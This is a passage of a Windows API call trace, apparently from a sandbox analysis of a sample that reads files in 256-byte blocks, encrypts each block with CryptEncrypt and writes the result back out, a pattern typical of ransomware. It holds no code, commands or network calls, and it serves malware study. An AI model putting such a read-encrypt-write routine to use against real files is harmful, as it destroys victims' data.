1 [0169.964] GetLastError () returned 0x0 [0169.964] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.965] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.965] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.965] GetLastError () returned 0x0 [0169.965] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.965] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.965] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.965] GetLastError () returned 0x0 [0169.965] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.965] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.965] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.965] GetLastError () returned 0x0 [0169.965] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.965] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.965] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.965] GetLastError () returned 0x0 [0169.965] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.965] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.966] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.966] GetLastError () returned 0x0 [0169.966] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.966] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.966] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.966] GetLastError () returned 0x0 [0169.966] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.966] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.966] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.966] GetLastError () returned 0x0 [0169.966] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.967] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.967] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.967] GetLastError () returned 0x0 [0169.967] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.967] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.967] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.967] GetLastError () returned 0x0 [0169.967] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.967] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.967] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.967] GetLastError () returned 0x0 [0169.967] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.967] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.967] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.967] GetLastError () returned 0x0 [0169.967] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.968] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.968] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.968] GetLastError () returned 0x0 [0169.968] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.968] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.968] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.968] GetLastError () returned 0x0 [0169.968] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.968] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.968] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.968] GetLastError () returned 0x0 [0169.968] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.968] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.968] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.968] GetLastError () returned 0x0 [0169.969] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.969] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.969] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.969] GetLastError () returned 0x0 [0169.969] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.969] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.969] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.969] GetLastError () returned 0x0 [0169.969] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.969] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.969] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.969] GetLastError () returned 0x0 [0169.969] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.969] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.969] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.969] GetLastError () returned 0x0 [0169.969] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.970] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.970] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.970] GetLastError () returned 0x0 [0169.970] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.970] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.970] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.970] GetLastError () returned 0x0 [0169.970] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.970] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.970] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.970] GetLastError () returned 0x0 [0169.970] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.970] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.970] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.971] GetLastError () returned 0x0 [0169.971] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.971] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.971] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.971] GetLastError () returned 0x0 [0169.971] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.971] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.971] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.971] GetLastError () returned 0x0 [0169.971] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.971] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.971] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.971] GetLastError () returned 0x0 [0169.971] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.971] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.971] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.971] GetLastError () returned 0x0 [0169.971] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.971] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.972] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.972] GetLastError () returned 0x0 [0169.972] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.972] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.972] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.972] GetLastError () returned 0x0 [0169.972] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.972] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.972] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.972] GetLastError () returned 0x0 [0169.972] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.972] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.972] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.972] GetLastError () returned 0x0 [0169.972] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.972] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.972] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.972] GetLastError () returned 0x0 [0169.972] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, 